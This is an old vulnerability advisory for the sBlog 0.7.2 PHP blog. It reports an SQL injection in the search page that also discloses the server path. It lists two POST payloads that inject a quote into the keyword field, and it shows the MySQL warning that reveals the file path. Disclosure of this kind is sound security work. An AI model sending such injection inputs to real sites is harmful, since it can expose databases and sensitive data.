Product : sBlog 0.7.2
Vulnerability :sBlog SQL Injection and Path Disclosure Vulnerability
Date of Disclosure : 02/05/06
Bugtraq ID : 17782
Summary:
Software: sBlog 0.7.2
Site: http://servous.se/
Description: sBlog is a simple and new PHP Blog.

Issue: Conducting a security benchmark on this open source software we have found that most of the versions of this software is prone to SQL Injection attack through which an attacker can trigger back sensitive information as well as gain administrative priviledges. The sql injection also discloses path information which may prove additional aid to the attacker.An unauthenticated attacker may execute arbitrary SQL statements on the web. This may compromise the database and expose sensitive information.

Exploit :
1.The sql attack has been tested with these POST variables
keyword='&search_loc=blog&cat=loc&bounceName=search_blog_to_lycos_uk&query=1

Path Disclosure

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /data/blog/uk/search.php on line 50

Your search for "'" did not return any matches!

2.The sql attack has been tested with these POST variables
keyword=%27&search_loc=blog&cat=loc&bounceName=search_blog_to_lycos_uk&query=1

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /data/blog/uk/search.php on line 50

Your search for "'" did not return any matches!

This exploit has been tested on existing version . Older versions may also be affected by the same vulenrability.

Author's Report : The Vulnerability has been reported .

Patch Status : Not Available.